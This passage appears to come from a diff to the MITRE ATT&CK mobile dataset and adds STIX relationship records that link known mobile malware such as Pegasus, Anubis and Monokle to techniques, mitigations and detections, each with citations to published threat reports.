"x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a0464679-71b6-4ab4-a72d-0428e4d75d5e", + "created": "2022-03-30T13:45:39.184Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation can often detect jailbroken or rooted devices.", + "modified": "2022-03-30T13:45:39.184Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b3bb33bf-9034-4d5c-8ea0-31d3bbd12b6b", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-WireLurker", + "description": "Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[WireLurker](https://attack.mitre.org/software/S0312) obfuscates its payload through complex code structure, multiple component versions, file hiding, code obfuscation and customized encryption to thwart anti-reversing.(Citation: PaloAlto-WireLurker)", + "relationship_type": "uses", + "source_ref": "malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f87bb2d2-e7fd-44ce-b537-e7e01086731c", + "type": "relationship", + "created": "2020-12-18T20:14:47.371Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T21:00:05.246Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) can send SMS messages.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--477edf7d-cc1f-49b7-9d96-f88399808775", + "created": "2022-04-05T20:15:43.660Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T20:15:43.660Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "target_ref": "attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c14efc74-8a5c-4a2d-b9ba-a231738c90dd", + "created": "2020-12-24T21:41:37.047Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[SilkBean](https://attack.mitre.org/software/S0549) has used HTTPS for C2 communication.(Citation: Lookout Uyghur Campaign)", + "modified": "2022-04-18T16:04:02.127Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d7aa436a-e66d-4217-be66-4414703dec07", + "type": "relationship", + "created": "2020-11-10T17:08:35.634Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-11-10T17:08:35.634Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has used incorrect file extensions and encryption to hide most of its assets, including secondary APKs, configuration files, and JAR or DEX files.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3bf5a566-986b-478c-b2da-e57caf261378", + "type": "relationship", + "created": "2019-09-03T19:45:48.515Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-09-11T13:25:19.216Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) Two attempts to elevate privileges by using a modified version of the DirtyCow exploit.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--450a1b75-efa5-4d7a-bcd5-d3e63723b408", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) monitors the connection state and tracks which types of networks the phone is connected to, potentially to determine the bandwidth and ability to send full data across the network.(Citation: Lookout-Pegasus)", + "modified": "2022-04-15T19:47:48.036Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8726b157-3575-450f-bb7f-f17bb18e6aef", + "created": "2022-03-30T20:41:43.314Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "New OS releases frequently contain additional limitations or controls around device location access.", + "modified": "2022-03-30T20:41:43.314Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e03b25b0-0779-48da-b5d7-28f1f6106363", + "type": "relationship", + "created": "2020-12-24T22:04:27.992Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:27.992Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has taken screenshots.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8e6b9c1e-5e28-4519-95c3-6b4a836661de", + "created": "2023-01-18T19:16:45.773Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:07:34.581Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) has used custom encryption to hide strings, potentially to evade antivirus products.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--63e67cba-4eae-4495-8897-2610103a0c41", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) exploits iOS vulnerabilities to escalate privileges.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4a4aba6e-2dc4-43a5-bcac-876c89114a57", + "created": "2023-03-20T18:43:49.345Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:49.345Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f012feab-5612-429f-81bd-ff75d6ffd04e", + "created": "2022-04-05T17:03:34.941Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T17:03:34.941Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f7039142-dbdc-4ffc-a54f-136ad57a6ac1", + "type": "relationship", + "created": "2020-07-20T13:49:03.693Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." + } + ], + "modified": "2020-09-24T15:12:24.242Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) collects the device’s IMSI and ICCID.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4586277d-bebd-4717-87c6-a31a9be741ed", + "type": "relationship", + "created": "2020-12-24T21:45:56.982Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:45:56.982Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can get file lists on the SD card.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--45253350-c802-4566-a72d-57d43d05fd63", + "type": "relationship", + "created": "2020-05-07T15:24:49.530Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-05-27T13:23:34.536Z", + "description": "Security updates frequently contain patches to vulnerabilities.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--d3bc5020-f6a2-41c0-8ccb-5e563101b60c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6b64d3f4-96d6-48e5-a57e-b5cf897670f9", + "created": "2021-01-05T20:16:20.500Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:27:33.948Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can collect SMS messages from the device.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c50b4da7-f0e1-4f6d-969c-dbc739d49d7c", + "created": "2021-01-05T20:16:20.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:40:43.898Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can collect the device’s call logs.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bb006be2-7d2c-4bb3-ab48-7c95e0ab8106", + "type": "relationship", + "created": "2020-12-14T14:52:03.255Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-14T14:52:03.255Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) has stored data embedded in the strings.xml resource file.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e7af5be1-721f-40c5-b647-659243a0a14b", + "type": "relationship", + "created": "2020-04-08T15:41:19.321Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2021-09-20T13:50:02.057Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can record phone calls and audio.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b247a4f6-3629-4123-84b0-c7c5b3e7e37e", + "created": "2022-03-30T20:45:34.433Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android Package Visibility", + "url": "https://developer.android.com/training/package-visibility", + "description": "Google. (n.d.). Package visibility filtering on Android. Retrieved April 11, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 11 introduced privacy enhancements to package visibility, filtering results that are returned from the package manager. iOS 12 removed the private API that could previously be used to list installed applications on non-app store applications.(Citation: Android Package Visibility)", + "modified": "2022-04-11T19:19:52.562Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--50c81a85-8c70-48df-a338-8622d2debc74", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:38:39.008Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) contains functionality to gather call logs.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fd6c7f4b-ce0f-4770-8487-786e41b63549", + "created": "2023-03-20T18:24:56.396Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:24:56.396Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bde9304b-4421-4185-a2c6-dabe1c080587", + "created": "2023-03-16T18:31:48.708Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:31:48.708Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a5f64f9e-3ed9-442b-a244-9857b926d93b", + "created": "2023-03-20T18:59:46.622Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:59:46.622Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7baa3cab-c4f8-4b91-a6c3-189ad7a6416c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:34:08.372Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) gathers contacts from the system by dumping the victim's address book.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5e360913-4986-4423-8d3c-46d3202b7787", + "type": "relationship", + "created": "2019-09-04T14:28:15.471Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-10-14T17:51:37.979Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can retrieve the salt used when storing the user’s password, aiding an adversary in computing the user’s plaintext password/PIN from the stored password hash. [Monokle](https://attack.mitre.org/software/S0407) can also capture the user’s dictionary, user-defined shortcuts, and browser history, enabling profiling of the user and their activities.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + 